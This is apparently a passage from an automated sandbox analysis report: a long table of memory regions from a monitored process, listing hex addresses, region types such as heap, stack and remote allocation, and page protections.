trusted library allocation
|
page read and write
|
||
|
21681608000
|
trusted library allocation
|
page read and write
|
||
|
216F5840000
|
trusted library allocation
|
page read and write
|
||
|
D7A000
|
trusted library allocation
|
page execute and read and write
|
||
|
EE2000
|
heap
|
page read and write
|
||
|
51C9000
|
trusted library allocation
|
page read and write
|
||
|
281E000
|
stack
|
page read and write
|
||
|
56DE000
|
stack
|
page read and write
|
||
|
52DE000
|
stack
|
page read and write
|
||
|
2AE0000
|
heap
|
page read and write
|
||
|
CF5000
|
stack
|
page read and write
|
||
|
1FA965B5000
|
heap
|
page read and write
|
||
|
24E159A1000
|
trusted library allocation
|
page read and write
|
||
|
24E149F0000
|
heap
|
page read and write
|
||
|
216F7850000
|
heap
|
page execute and read and write
|
||
|
636E000
|
stack
|
page read and write
|
||
|
1180000
|
heap
|
page read and write
|
||
|
5E1F000
|
stack
|
page read and write
|
||
|
2B68000
|
trusted library allocation
|
page read and write
|
||
|
7FFD3477B000
|
trusted library allocation
|
page read and write
|
||
|
1160000
|
trusted library allocation
|
page read and write
|
||
|
24E1A254000
|
heap
|
page read and write
|
||
|
646F000
|
stack
|
page read and write
|
||
|
21681D7F000
|
trusted library allocation
|
page read and write
|
||
|
24E15501000
|
trusted library allocation
|
page read and write
|
||
|
216F796A000
|
heap
|
page read and write
|
||
|
6640000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34A30000
|
trusted library allocation
|
page read and write
|
||
|
216F70C7000
|
heap
|
page read and write
|
||
|
2168008A000
|
trusted library allocation
|
page read and write
|
||
|
7E0000
|
heap
|
page read and write
|
||
|
2850000
|
trusted library allocation
|
page read and write
|
||
|
51F5000
|
trusted library allocation
|
page read and write
|
||
|
24E15B80000
|
trusted library section
|
page readonly
|
||
|
C50000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349A0000
|
trusted library allocation
|
page read and write
|
||
|
1FA96551000
|
heap
|
page read and write
|
||
|
24E15215000
|
heap
|
page read and write
|
||
|
D50000
|
trusted library allocation
|
page read and write
|
||
|
FC0000
|
heap
|
page read and write
|
||
|
C698ECB000
|
stack
|
page read and write
|
||
|
1772000
|
heap
|
page read and write
|
||
|
1FA96592000
|
heap
|
page read and write
|
||
|
216F55B0000
|
heap
|
page read and write
|
||
|
5044000
|
trusted library allocation
|
page read and write
|
||
|
24E19F20000
|
trusted library allocation
|
page read and write
|
||
|
1002000
|
heap
|
page read and write
|
||
|
1FA96557000
|
heap
|
page read and write
|
||
|
7FFD34A90000
|
trusted library allocation
|
page read and write
|
||
|
24E15200000
|
heap
|
page read and write
|
||
|
24E15F20000
|
trusted library allocation
|
page read and write
|
||
|
9EE000
|
stack
|
page read and write
|
||
|
889EFFE000
|
stack
|
page read and write
|
||
|
24E1531A000
|
heap
|
page read and write
|
||
|
DE0000
|
heap
|
page read and write
|
||
|
1FA96557000
|
heap
|
page read and write
|
||
|
51B0000
|
trusted library allocation
|
page read and write
|
||
|
111E000
|
trusted library allocation
|
page read and write
|
||
|
6706000
|
trusted library allocation
|
page read and write
|
||
|
24E1A303000
|
heap
|
page read and write
|
||
|
24E19F90000
|
trusted library allocation
|
page read and write
|
||
|
76B000
|
stack
|
page read and write
|
||
|
1FA96591000
|
heap
|
page read and write
|
||
|
62AF000
|
stack
|
page read and write
|
||
|
2BB5000
|
trusted library allocation
|
page read and write
|
||
|
21681C75000
|
trusted library allocation
|
page read and write
|
||
|
216817FA000
|
trusted library allocation
|
page read and write
|
||
|
24E1A2E2000
|
heap
|
page read and write
|
||
|
5200000
|
trusted library section
|
page read and write
|
||
|
56FE000
|
stack
|
page read and write
|
||
|
531E000
|
stack
|
page read and write
|
||
|
57FF000
|
stack
|
page read and write
|
||
|
2B71000
|
trusted library allocation
|
page read and write
|
||
|
C6977FE000
|
stack
|
page read and write
|
||
|
2169006D000
|
trusted library allocation
|
page read and write
|
||
|
E00000
|
heap
|
page read and write
|
||
|
112F000
|
stack
|
page read and write
|
||
|
2930000
|
trusted library allocation
|
page read and write
|
||
|
389E000
|
stack
|
page read and write
|
||
|
7FFD349F0000
|
trusted library allocation
|
page read and write
|
||
|
4FBF000
|
stack
|
page read and write
|
||
|
24E19FD0000
|
trusted library allocation
|
page read and write
|
||
|
7D0000
|
heap
|
page read and write
|
||
|
5030000
|
trusted library allocation
|
page read and write
|
||
|
1FA963D0000
|
heap
|
page read and write
|
||
|
1FA96583000
|
heap
|
page read and write
|
||
|
6630000
|
trusted library allocation
|
page read and write
|
||
|
3B21000
|
trusted library allocation
|
page read and write
|
||
|
2CD2000
|
trusted library allocation
|
page read and write
|
||
|
21681B2F000
|
trusted library allocation
|
page read and write
|
||
|
1150000
|
trusted library allocation
|
page read and write
|
||
|
24E14B13000
|
heap
|
page read and write
|
||
|
21681B1C000
|
trusted library allocation
|
page read and write
|
||
|
1150000
|
trusted library allocation
|
page read and write
|
||
|
E28000
|
heap
|
page read and write
|
||
|
5020000
|
trusted library allocation
|
page read and write
|
||
|
DD0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2D15000
|
trusted library allocation
|
page read and write
|
||
|
65AE000
|
stack
|
page read and write
|
||
|
2B23000
|
trusted library allocation
|
page read and write
|
||
|
C697FBE000
|
stack
|
page read and write
|
||
|
E55000
|
heap
|
page read and write
|
||
|
216F5910000
|
heap
|
page read and write
|
||
|
50DE000
|
stack
|
page read and write
|
||
|
CF809FA000
|
stack
|
page read and write
|
||
|
216F5610000
|
heap
|
page read and write
|
||
|
2B1B000
|
trusted library allocation
|
page read and write
|
||
|
EC8000
|
heap
|
page read and write
|
||
|
C20000
|
trusted library allocation
|
page read and write
|
||
|
216F7900000
|
heap
|
page read and write
|
||
|
60AB000
|
heap
|
page read and write
|
||
|
16F0000
|
heap
|
page read and write
|
||
|
24E1A242000
|
heap
|
page read and write
|
||
|
5070000
|
trusted library allocation
|
page read and write
|
||
|
24E14CD0000
|
heap
|
page read and write
|
||
|
2B28000
|
trusted library allocation
|
page read and write
|
||
|
E2E000
|
heap
|
page read and write
|
||
|
2BAD000
|
trusted library allocation
|
page read and write
|
||
|
F74000
|
heap
|
page read and write
|
||
|
296E000
|
stack
|
page read and write
|
||
|
24E15302000
|
heap
|
page read and write
|
||
|
3D9E000
|
stack
|
page read and write
|
||
|
5F2E000
|
stack
|
page read and write
|
||
|
24E15B90000
|
trusted library section
|
page readonly
|
||
|
2B20000
|
trusted library allocation
|
page read and write
|
||
|
21680C33000
|
trusted library allocation
|
page read and write
|
||
|
C698D4C000
|
stack
|
page read and write
|
||
|
53AD000
|
heap
|
page read and write
|
||
|
51CE000
|
trusted library allocation
|
page read and write
|
||
|
2847000
|
trusted library allocation
|
page read and write
|
||
|
CF802FE000
|
unkown
|
page readonly
|
||
|
1550000
|
heap
|
page read and write
|
||
|
C697DB7000
|
stack
|
page read and write
|
||
|
5E2E000
|
stack
|
page read and write
|
||
|
1131000
|
trusted library allocation
|
page read and write
|
||
|
28FB000
|
trusted library allocation
|
page read and write
|
||
|
C698BCF000
|
stack
|
page read and write
|
||
|
7FFD349D0000
|
trusted library allocation
|
page read and write
|
||
|
216F7890000
|
heap
|
page read and write
|
||
|
39DE000
|
stack
|
page read and write
|
||
|
C69803E000
|
stack
|
page read and write
|
||
|
7FFD34770000
|
trusted library allocation
|
page read and write
|
||
|
51D0000
|
trusted library allocation
|
page read and write
|
||
|
216F55A0000
|
heap
|
page read and write
|
||
|
1FA96568000
|
heap
|
page read and write
|
||
|
24E1535A000
|
heap
|
page read and write
|
||
|
2A30000
|
heap
|
page execute and read and write
|
||
|
889F1FF000
|
stack
|
page read and write
|
||
|
7FFD3491A000
|
trusted library allocation
|
page read and write
|
||
|
3A99000
|
trusted library allocation
|
page read and write
|
||
|
21690001000
|
trusted library allocation
|
page read and write
|
||
|
2B52000
|
trusted library allocation
|
page read and write
|
||
|
24E1A2E9000
|
heap
|
page read and write
|
||
|
CF8037E000
|
stack
|
page read and write
|
||
|
2A81000
|
trusted library allocation
|
page read and write
|
||
|
216F56AE000
|
heap
|
page read and write
|
||
|
21680001000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34930000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B3A000
|
trusted library allocation
|
page read and write
|
||
|
5010000
|
trusted library allocation
|
page read and write
|
||
|
216F791B000
|
heap
|
page read and write
|
||
|
216815DB000
|
trusted library allocation
|
page read and write
|
||
|
990000
|
heap
|
page read and write
|
||
|
2A2E000
|
stack
|
page read and write
|
||
|
CDE000
|
stack
|
page read and write
|
||
|
5570000
|
trusted library allocation
|
page execute and read and write
|
||
|
216F7971000
|
heap
|
page read and write
|
||
|
CF8067E000
|
stack
|
page read and write
|
||
|
60ED000
|
heap
|
page read and write
|
||
|
CF8007E000
|
stack
|
page read and write
|
||
|
2B1D000
|
trusted library allocation
|
page read and write
|
||
|
24E1A2F7000
|
heap
|
page read and write
|
||
|
539E000
|
stack
|
page read and write
|
||
|
216F7380000
|
heap
|
page execute and read and write
|
||
|
24E14AFF000
|
heap
|
page read and write
|
||
|
5166000
|
trusted library allocation
|
page read and write
|
||
|
2A60000
|
heap
|
page read and write
|
||
|
C72000
|
trusted library allocation
|
page read and write
|
||
|
7FFD34AA0000
|
trusted library allocation
|
page read and write
|
||
|
24E1A150000
|
remote allocation
|
page read and write
|
||
|
216F56B9000
|
heap
|
page read and write
|
||
|
DE0000
|
trusted library allocation
|
page read and write
|
||
|
C697D3E000
|
stack
|
page read and write
|
||
|
569E000
|
stack
|
page read and write
|
||
|
2990000
|
trusted library allocation
|
page read and write
|
||
|
FDC000
|
heap
|
page read and write
|
||
|
6690000
|
trusted library allocation
|
page read and write
|
||
|
CFFFBFE000
|
unkown
|
page readonly
|
||
|
51BF000
|
stack
|
page read and write
|
||
|
D8B000
|
trusted library allocation
|
page execute and read and write
|
||
|
3120000
|
heap
|
page read and write
|
||
|
C30000
|
heap
|
page read and write
|
||
|
5190000
|
trusted library allocation
|
page read and write
|
||
|
1FA9655A000
|
heap
|
page read and write
|
||
|
21681D6D000
|
trusted library allocation
|
page read and write
|
||
|
2BEF000
|
stack
|
page read and write
|
||
|
CFFFFFE000
|
unkown
|
page readonly
|
||
|
E7C000
|
heap
|
page read and write
|
||
|
399E000
|
stack
|
page read and write
|
||
|
24E1A100000
|
trusted library allocation
|
page read and write
|
||
|
21681B18000
|
trusted library allocation
|
page read and write
|
||
|
1FA9659A000
|
heap
|
page read and write
|
||
|
1163000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34820000
|
trusted library allocation
|
page execute and read and write
|
||
|
24E14A73000
|
heap
|
page read and write
|
||
|
536D000
|
stack
|
page read and write
|
||
|
6692000
|
trusted library allocation
|
page read and write
|
||
|
C698B0E000
|
stack
|
page read and write
|
||
|
11CE000
|
stack
|
page read and write
|
||
|
293A000
|
trusted library allocation
|
page execute and read and write
|
||
|
24E1A300000
|
heap
|
page read and write
|
||
|
6674000
|
trusted library allocation
|
page read and write
|
||
|
1FA9657E000
|
heap
|
page read and write
|
||
|
216F7922000
|
heap
|
page read and write
|
||
|
C30000
|
heap
|
page read and write
|
||
|
7FFD34970000
|
trusted library allocation
|
page read and write
|
||
|
CF8057E000
|
stack
|
page read and write
|
||
|
CF810FE000
|
unkown
|
page readonly
|
||
|
F5C000
|
heap
|
page read and write
|
||
|
7FFD34A10000
|
trusted library allocation
|
page read and write
|
||
|
F38000
|
heap
|
page read and write
|
||
|
10CB000
|
stack
|
page read and write
|
||
|
216F7750000
|
heap
|
page read and write
|
||
|
CF8017E000
|
stack
|
page read and write
|
||
|
889F2FF000
|
stack
|
page read and write
|
||
|
1FA96795000
|
heap
|
page read and write
|
||
|
5D0000
|
unkown
|
page readonly
|
||
|
CF800FE000
|
unkown
|
page readonly
|
||
|
DF8000
|
heap
|
page read and write
|
||
|
24E1A150000
|
remote allocation
|
page read and write
|
||
|
1FA965B6000
|
heap
|
page read and write
|
||
|
1FA96557000
|
heap
|
page read and write
|
||
|
24E14AB0000
|
heap
|
page read and write
|
||
|
7FFD34816000
|
trusted library allocation
|
page read and write
|
||
|
216F58D0000
|
trusted library allocation
|
page read and write
|
||
|
C62000
|
trusted library allocation
|
page read and write
|
||
|
546F000
|
stack
|
page read and write
|
||
|
24E1A290000
|
heap
|
page read and write
|
||
|
1FA9657C000
|
heap
|
page read and write
|
||
|
522D000
|
stack
|
page read and write
|
||
|
1FA9654C000
|
heap
|
page read and write
|
||
|
5142000
|
trusted library allocation
|
page read and write
|
||
|
28F2000
|
trusted library allocation
|
page read and write
|
||
|
1174000
|
trusted library allocation
|
page read and write
|
||
|
C7B000
|
trusted library allocation
|
page execute and read and write
|
||
|
CFFF7FE000
|
unkown
|
page readonly
|
||
|
31F0000
|
heap
|
page read and write
|
||
|
21681600000
|
trusted library allocation
|
page read and write
|
||
|
3BF5000
|
trusted library allocation
|
page read and write
|
||
|
D64000
|
trusted library allocation
|
page read and write
|
||
|
AF6000
|
stack
|
page read and write
|
||
|
7FFD34763000
|
trusted library allocation
|
page execute and read and write
|
||
|
216F5893000
|
trusted library allocation
|
page read and write
|
||
|
24E14A7B000
|
heap
|
page read and write
|
||
|
216F56FD000
|
heap
|
page read and write
|
||
|
D1D000
|
stack
|
page read and write
|
||
|
71A000
|
stack
|
page read and write
|
||
|
7FFD34AB0000
|
trusted library allocation
|
page read and write
|
||
|
C60000
|
trusted library allocation
|
page read and write
|
||
|
21681B65000
|
trusted library allocation
|
page read and write
|
||
|
216F5915000
|
heap
|
page read and write
|
||
|
7FFD34911000
|
trusted library allocation
|
page read and write
|
||
|
216F5890000
|
trusted library allocation
|
page read and write
|
||
|
24E1A2BF000
|
heap
|
page read and write
|
||
|
61AE000
|
stack
|
page read and write
|
||
|
7FFD34980000
|
trusted library allocation
|
page read and write
|
||
|
112A000
|
trusted library allocation
|
page read and write
|
||
|
5130000
|
heap
|
page execute and read and write
|
||
|
24E19FE0000
|
trusted library allocation
|
page read and write
|
||
|
2D0F000
|
trusted library allocation
|
page read and write
|
||
|
F70000
|
heap
|
page read and write
|
||
|
1738000
|
heap
|
page read and write
|
||
|
1140000
|
heap
|
page read and write
|
||
|
24E14A5B000
|
heap
|
page read and write
|
||
|
2860000
|
heap
|
page execute and read and write
|
||
|
2B7D000
|
trusted library allocation
|
page read and write
|
||
|
6647000
|
trusted library allocation
|
page read and write
|
||
|
21680233000
|
trusted library allocation
|
page read and write
|
||
|
1FA965D6000
|
heap
|
page read and write
|
||
|
216F5670000
|
heap
|
page read and write
|
||
|
2B66000
|
trusted library allocation
|
page read and write
|
||
|
889EEFE000
|
stack
|
page read and write
|
||
|
C6A000
|
trusted library allocation
|
page execute and read and write
|
||
|
24E1A22C000
|
heap
|
page read and write
|
||
|
C66000
|
trusted library allocation
|
page execute and read and write
|
||
|
24E14A00000
|
heap
|
page read and write
|
||
|
3C5E000
|
stack
|
page read and write
|
||
|
1730000
|
heap
|
page read and write
|
||
|
C77000
|
trusted library allocation
|
page execute and read and write
|
||
|
EDB000
|
heap
|
page read and write
|
||
|
6660000
|
trusted library allocation
|
page read and write
|
||
|
216F78F0000
|
heap
|
page execute and read and write
|
||
|
631000
|
unkown
|
page readonly
|
||
|
168E000
|
stack
|
page read and write
|
||
|
66A0000
|
trusted library allocation
|
page read and write
|
||
|
C697CF8000
|
stack
|
page read and write
|
||
|
1FA9655B000
|
heap
|
page read and write
|
||
|
C697BFD000
|
stack
|
page read and write
|
||
|
24E14A79000
|
heap
|
page read and write
|
||
|
3AF7000
|
trusted library allocation
|
page read and write
|
||
|
50E0000
|
trusted library section
|
page read and write
|
||
|
7FFD34A00000
|
trusted library allocation
|
page read and write
|
||
|
54EE000
|
stack
|
page read and write
|
||
|
5F7E000
|
stack
|
page read and write
|
||
|
24E14A13000
|
heap
|
page read and write
|
||
|
3B01000
|
trusted library allocation
|
page read and write
|
||
|
216F55D0000
|
heap
|
page read and write
|
||
|
3E9F000
|
stack
|
page read and write
|
||
|
E61000
|
heap
|
page read and write
|
||
|
5015000
|
trusted library allocation
|
page read and write
|
||
|
4FC0000
|
trusted library section
|
page read and write
|
||
|
780000
|
heap
|
page read and write
|
||
|
1009000
|
heap
|
page read and write
|
||
|
51C4000
|
trusted library allocation
|
page read and write
|
||
|
4FD6000
|
trusted library section
|
page read and write
|
||
|
529E000
|
stack
|
page read and write
|
||
|
2C1F000
|
trusted library allocation
|
page read and write
|
||
|
1FA965D4000
|
heap
|
page read and write
|
||
|
CFFF4F7000
|
stack
|
page read and write
|
||
|
5140000
|
trusted library allocation
|
page read and write
|
||
|
1FA964B0000
|
heap
|
page read and write
|
||
|
C40000
|
trusted library allocation
|
page read and write
|
||
|
28F0000
|
trusted library allocation
|
page read and write
|
||
|
C69813C000
|
stack
|
page read and write
|
||
|
21681C69000
|
trusted library allocation
|
page read and write
|
||
|
519D000
|
trusted library allocation
|
page read and write
|
||
|
1136000
|
trusted library allocation
|
page read and write
|
||
|
3B1E000
|
stack
|
page read and write
|
||
|
24E1A0E0000
|
trusted library allocation
|
page read and write
|
||
|
CFFEF7C000
|
stack
|
page read and write
|
||
|
7FFD34846000
|
trusted library allocation
|
page execute and read and write
|
||
|
606E000
|
stack
|
page read and write
|
||
|
7FFD34880000
|
trusted library allocation
|
page execute and read and write
|
||
|
5195000
|
trusted library allocation
|
page read and write
|
||
|
2D09000
|
trusted library allocation
|
page read and write
|
||
|
2970000
|
trusted library allocation
|
page execute and read and write
|
||
|
5040000
|
trusted library allocation
|
page read and write
|
||
|
24E14AA6000
|
heap
|
page read and write
|
||
|
216F56B3000
|
heap
|
page read and write
|
||
|
24E15170000
|
trusted library section
|
page read and write
|
||
|
3A71000
|
trusted library allocation
|
page read and write
|
||
|
1FA9659A000
|
heap
|
page read and write
|
||
|
7FFD34A50000
|
trusted library allocation
|
page read and write
|
||
|
216F56F9000
|
heap
|
page read and write
|
||
|
294B000
|
trusted library allocation
|
page execute and read and write
|
||
|
3B1E000
|
trusted library allocation
|
page read and write
|
||
|
4B7E000
|
stack
|
page read and write
|
||
|
24E1A150000
|
remote allocation
|
page read and write
|
||
|
C697EB9000
|
stack
|
page read and write
|
||
|
C698B8D000
|
stack
|
page read and write
|
||
|
3A81000
|
trusted library allocation
|
page read and write
|
||
|
5180000
|
trusted library allocation
|
page read and write
|
||
|
E20000
|
heap
|
page read and write
|
||
|
64AE000
|
stack
|
page read and write
|
||
|
24E15840000
|
trusted library allocation
|
page read and write
|
||
|
5127000
|
trusted library allocation
|
page read and write
|
||
|
CF807FC000
|
stack
|
page read and write
|
||
|
2940000
|
trusted library allocation
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
24E15300000
|
heap
|
page read and write
|
||
|
2D1B000
|
trusted library allocation
|
page read and write
|
||
|
2BB1000
|
trusted library allocation
|
page read and write
|
||
|
3B0D000
|
trusted library allocation
|
page read and write
|
||
|
3ADE000
|
stack
|
page read and write
|
||
|
664C000
|
trusted library allocation
|
page read and write
|
||
|
1FA96557000
|
heap
|
page read and write
|
||
|
216815F6000
|
trusted library allocation
|
page read and write
|
||
|
7B0000
|
unkown
|
page readonly
|
||
|
54AE000
|
stack
|
page read and write
|
||
|
216F7270000
|
heap
|
page read and write
|
||
|
559E000
|
stack
|
page read and write
|
||
|
E93000
|
heap
|
page read and write
|
||
|
DEE000
|
stack
|
page read and write
|
||
|
111B000
|
trusted library allocation
|
page read and write
|
||
|
CF801FE000
|
unkown
|
page readonly
|
||
|
3BF1000
|
trusted library allocation
|
page read and write
|
||
|
C36000
|
heap
|
page read and write
|
||
|
7FFD3481C000
|
trusted library allocation
|
page execute and read and write
|
||
|
C6976F3000
|
stack
|
page read and write
|
||
|
24E19FA0000
|
trusted library allocation
|
page read and write
|
||
|
5144000
|
trusted library allocation
|
page read and write
|
||
|
5D2E000
|
stack
|
page read and write
|
||
|
2BC1000
|
trusted library allocation
|
page read and write
|
||
|
216F7940000
|
heap
|
page read and write
|
||
|
532E000
|
stack
|
page read and write
|
||
|
3A9A000
|
trusted library allocation
|
page read and write
|
||
|
216F5679000
|
heap
|
page read and write
|
||
|
CFFFDFE000
|
unkown
|
page readonly
|
||
|
F2E000
|
stack
|
page read and write
|
||
|
2936000
|
trusted library allocation
|
page execute and read and write
|
||
|
CF8107E000
|
stack
|
page read and write
|
||
|
E4C000
|
heap
|
page read and write
|
||
|
4B6E000
|
stack
|
page read and write
|
||
|
1FA96583000
|
heap
|
page read and write
|
||
|
24E1A080000
|
trusted library allocation
|
page read and write
|
||
|
889F6FF000
|
stack
|
page read and write
|
||
|
5050000
|
trusted library allocation
|
page read and write
|
||
|
4FD4000
|
trusted library section
|
page read and write
|
||
|
24E14A95000
|
heap
|
page read and write
|
||
|
24E14B02000
|
heap
|
page read and write
|
||
|
2BF1000
|
trusted library allocation
|
page read and write
|
||
|
C697AFC000
|
stack
|
page read and write
|
||
|
583E000
|
stack
|
page read and write
|
||
|
552E000
|
stack
|
page read and write
|
||
|
7FFD34762000
|
trusted library allocation
|
page read and write
|
||
|
5175000
|
trusted library allocation
|
page read and write
|
||
|
6737000
|
trusted library allocation
|
page read and write
|
||
|
2BB9000
|
trusted library allocation
|
page read and write
|
||
|
2CE4000
|
trusted library allocation
|
page read and write
|
||
|
CF804FE000
|
unkown
|
page readonly
|
||
|
7FFD34A80000
|
trusted library allocation
|
page read and write
|
||
|
24E1A2C7000
|
heap
|
page read and write
|
||
|
C697C7D000
|
stack
|
page read and write
|
||
|
1FA9659A000
|
heap
|
page read and write
|
||
|
1FA96568000
|
heap
|
page read and write
|
||
|
6695000
|
trusted library allocation
|
page read and write
|
||
|
24E19F30000
|
trusted library allocation
|
page read and write
|
||
|
216F79A0000
|
heap
|
page read and write
|
||
|
9A0000
|
heap
|
page read and write
|
||
|
3D5F000
|
stack
|
page read and write
|
||
|
1FA9659A000
|
heap
|
page read and write
|
||
|
2980000
|
trusted library allocation
|
page read and write
|
||
|
24E15313000
|
heap
|
page read and write
|
||
|
6750000
|
trusted library allocation
|
page read and write
|
||
|
2169000F000
|
trusted library allocation
|
page read and write
|
||
|
3A94000
|
trusted library allocation
|
page read and write
|
||
|
CFFFCF9000
|
stack
|
page read and write
|
||
|
EEF000
|
stack
|
page read and write
|
||
|
CFFFEFB000
|
stack
|
page read and write
|
||
|
CFFF6FE000
|
stack
|
page read and write
|
||
|
7FFD349C0000
|
trusted library allocation
|
page read and write
|
||
|
AF7000
|
stack
|
page read and write
|
||
|
EF5000
|
heap
|
page read and write
|
||
|
24E1531A000
|
heap
|
page read and write
|
||
|
24E1A00E000
|
trusted library allocation
|
page read and write
|
||
|
F2E000
|
stack
|
page read and write
|
||
|
E10000
|
trusted library allocation
|
page read and write
|
||
|
21681C63000
|
trusted library allocation
|
page read and write
|
||
|
29A0000
|
heap
|
page execute and read and write
|
||
|
4FC0000
|
heap
|
page read and write
|
||
|
2CBD000
|
trusted library allocation
|
page read and write
|
||
|
C44000
|
trusted library allocation
|
page read and write
|
||
|
2916000
|
trusted library allocation
|
page read and write
|
||
|
1FA96580000
|
heap
|
page read and write
|
||
|
1110000
|
trusted library allocation
|
page read and write
|
||
|
1122000
|
trusted library allocation
|
page read and write
|
||
|
FE0000
|
trusted library allocation
|
page read and write
|
||
|
5049000
|
trusted library allocation
|
page read and write
|
||
|
CFFF9FE000
|
unkown
|
page readonly
|
||
|
C697F3E000
|
stack
|
page read and write
|
||
|
24E19FF0000
|
trusted library allocation
|
page read and write
|
||
|
DF0000
|
heap
|
page read and write
|
||
|
24E1A2FA000
|
heap
|
page read and write
|
||
|
216F5850000
|
heap
|
page readonly
|
||
|
C697B7F000
|
stack
|
page read and write
|
||
|
2947000
|
trusted library allocation
|
page execute and read and write
|
||
|
889F4FE000
|
stack
|
page read and write
|
||
|
1FA965B9000
|
heap
|
page read and write
|
||
|
216F7770000
|
heap
|
page read and write
|
||
|
2830000
|
heap
|
page read and write
|
||
|
EF7000
|
heap
|
page read and write
|
||
|
1FA96557000
|
heap
|
page read and write
|
||
|
1FA96581000
|
heap
|
page read and write
|
||
|
E28000
|
heap
|
page read and write
|
||
|
21681C6F000
|
trusted library allocation
|
page read and write
|
||
|
1FA96530000
|
heap
|
page read and write
|
||
|
7FFD34950000
|
trusted library allocation
|
page execute and read and write
|
||
|
CFFFAFB000
|
stack
|
page read and write
|
||
|
D5D000
|
trusted library allocation
|
page execute and read and write
|
||
|
2BC5000
|
trusted library allocation
|
page read and write
|
||
|
216F5650000
|
trusted library allocation
|
page read and write
|
||
|
16CE000
|
stack
|
page read and write
|
||
|
216F7400000
|
heap
|
page read and write
|
||
|
24E1A0F0000
|
trusted library allocation
|
page read and write
|
||
|
51E0000
|
heap
|
page execute and read and write
|
||
|
27DD000
|
stack
|
page read and write
|
||
|
2C3F000
|
trusted library allocation
|
page read and write
|
||
|
5188000
|
trusted library allocation
|
page read and write
|
||
|
535E000
|
stack
|
page read and write
|
||
|
D20000
|
heap
|
page read and write
|
||
|
D54000
|
trusted library allocation
|
page read and write
|
||
|
1FA965AD000
|
heap
|
page read and write
|
||
|
51F0000
|
trusted library allocation
|
page read and write
|
||
|
CF805FE000
|
unkown
|
page readonly
|
||
|
1FA96568000
|
heap
|
page read and write
|
||
|
7FFD349B0000
|
trusted library allocation
|
page read and write
|
||
|
24E14AB6000
|
heap
|
page read and write
|
||
|
1FA965D0000
|
heap
|
page read and write
|
||
|
290E000
|
trusted library allocation
|
page read and write
|
||
|
E0E000
|
heap
|
page read and write
|
||
|
1FA9656E000
|
heap
|
page read and write
|
||
|
F66000
|
heap
|
page read and write
|
||
|
2D7B000
|
trusted library allocation
|
page read and write
|
||
|
6740000
|
trusted library allocation
|
page read and write
|
||
|
7B2000
|
unkown
|
page readonly
|
||
|
5D2000
|
unkown
|
page readonly
|
||
|
216901B0000
|
trusted library allocation
|
page read and write
|
||
|
D87000
|
trusted library allocation
|
page execute and read and write
|
||
|
21681C66000
|
trusted library allocation
|
page read and write
|
||
|
24E1A080000
|
trusted library allocation
|
page read and write
|
||
|
7FFD349E0000
|
trusted library allocation
|
page read and write
|
||
|
5C2E000
|
stack
|
page read and write
|
||
|
216F72A7000
|
heap
|
page read and write
|
||
|
2CDB000
|
trusted library allocation
|
page read and write
|
||
|
2925000
|
trusted library allocation
|
page read and write
|
||
|
3B2C000
|
trusted library allocation
|
page read and write
|
||
|
1154000
|
trusted library allocation
|
page read and write
|
||
|
24E1A2E6000
|
heap
|
page read and write
|
||
|
663E000
|
trusted library allocation
|
page read and write
|
||
|
CF8027E000
|
stack
|
page read and write
|
||
|
515E000
|
trusted library allocation
|
page read and write
|
||
|
3A97000
|
trusted library allocation
|
page read and write
|
||
|
5120000
|
trusted library allocation
|
page read and write
|
||
|
21681B5C000
|
trusted library allocation
|
page read and write
|
||
|
2A7E000
|
stack
|
page read and write
|
||
|
1FA96555000
|
heap
|
page read and write
|
||
|
7CE000
|
stack
|
page read and write
|
||
|
6650000
|
trusted library allocation
|
page execute and read and write
|
||
|
5F6E000
|
stack
|
page read and write
|
||
|
2911000
|
trusted library allocation
|
page read and write
|
||
|
216F7210000
|
heap
|
page read and write
|
||
|
504E000
|
trusted library allocation
|
page read and write
|
||
|
24E14A7D000
|
heap
|
page read and write
|
||
|
24E1A110000
|
trusted library allocation
|
page read and write
|
||
|
2960000
|
trusted library allocation
|
page read and write
|
||
|
F30000
|
trusted library allocation
|
page read and write
|
||
|
24E15160000
|
trusted library allocation
|
page read and write
|
||
|
501D000
|
trusted library allocation
|
page read and write
|
||
|
CF8047E000
|
stack
|
page read and write
|
||
|
7FFD3476D000
|
trusted library allocation
|
page execute and read and write
|
||
|
5518000
|
heap
|
page read and write
|
||
|
DF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD34A70000
|
trusted library allocation
|
page read and write
|
||
|
EB4000
|
heap
|
page read and write
|
||
|
24E1A2F2000
|
heap
|
page read and write
|
||
|
1FA96568000
|
heap
|
page read and write
|
||
|
28F4000
|
trusted library allocation
|
page read and write
|
||
|
D3F000
|
stack
|
page read and write
|
||
|
21681AD4000
|
trusted library allocation
|
page read and write
|
||
|
3ADC000
|
trusted library allocation
|
page read and write
|
||
|
2BE8000
|
trusted library allocation
|
page read and write
|
||
|
6760000
|
trusted library allocation
|
page execute and read and write
|
||
|
24E1A21F000
|
heap
|
page read and write
|
||
|
4EB0000
|
heap
|
page read and write
|
||
|
7FFD34900000
|
trusted library allocation
|
page read and write
|
||
|
2BC9000
|
trusted library allocation
|
page read and write
|
||
|
29EE000
|
stack
|
page read and write
|
||
|
1FA9659A000
|
heap
|
page read and write
|
||
|
7FFD34A40000
|
trusted library allocation
|
page read and write
|
||
|
2A40000
|
trusted library allocation
|
page read and write
|
||
|
556E000
|
stack
|
page read and write
|
||
|
F60000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B2F000
|
trusted library allocation
|
page read and write
|
||
|
24E149D0000
|
heap
|
page read and write
|
||
|
216F5761000
|
heap
|
page read and write
|
||
|
216F7215000
|
heap
|
page read and write
|
||
|
F57000
|
heap
|
page read and write
|
||
|
24E14AA0000
|
heap
|
page read and write
|
||
|
2ACD000
|
stack
|
page read and write
|
||
|
400000
|
remote allocation
|
page execute and read and write
|
||
|
C697A7F000
|
stack
|
page read and write
|
||
|
2970000
|
heap
|
page execute and read and write
|
||
|
216F56CE000
|
heap
|
page read and write
|
There are 697 hidden memdumps, click here to show them.